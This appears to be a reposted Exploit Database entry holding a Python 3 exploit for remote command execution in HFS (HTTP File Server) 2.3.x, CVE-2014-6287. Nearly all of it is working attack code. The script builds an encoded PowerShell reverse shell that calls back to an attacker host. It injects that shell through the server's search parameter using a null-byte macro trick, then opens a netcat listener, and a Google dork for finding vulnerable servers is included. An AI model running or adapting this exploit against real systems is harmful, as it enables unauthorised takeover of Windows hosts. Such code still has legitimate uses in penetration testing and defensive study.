HFS (HTTP File Server) 2.3.x – Remote Command Execution (3)

• Exploit Database
• 15 阅读

• 作者： Pergyz
  日期： 2021-02-23
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49584/

• # Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
  # Google Dork: intext:"httpfileserver 2.3"
  # Date: 20/02/2021
  # Exploit Author: Pergyz
  # Vendor Homepage: http://www.rejetto.com/hfs/
  # Software Link: https://sourceforge.net/projects/hfs/
  # Version: 2.3.x
  # Tested on: Microsoft Windows Server 2012 R2 Standard
  # CVE : CVE-2014-6287
  # Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
  
  #!/usr/bin/python3
  
  import base64
  import os
  import urllib.request
  import urllib.parse
  
  lhost = "10.10.10.1"
  lport = 1111
  rhost = "10.10.10.8"
  rport = 80
  
  # Define the command to be written to a file
  command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'
  
  # Encode the command in base64 format
  encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
  print("\nEncoded the command in base64 format...")
  
  # Define the payload to be included in the URL
  payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'
  
  # Encode the payload and send a HTTP GET request
  encoded_payload = urllib.parse.quote_plus(payload)
  url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
  urllib.request.urlopen(url)
  print("\nEncoded the payload and sent a HTTP GET request to the target...")
  
  # Print some information
  print("\nPrinting some information for debugging...")
  print("lhost: ", lhost)
  print("lport: ", lport)
  print("rhost: ", rhost)
  print("rport: ", rport)
  print("payload: ", payload)
  
  # Listen for connections
  print("\nListening for connection...")
  os.system(f'nc -nlvp {lport}')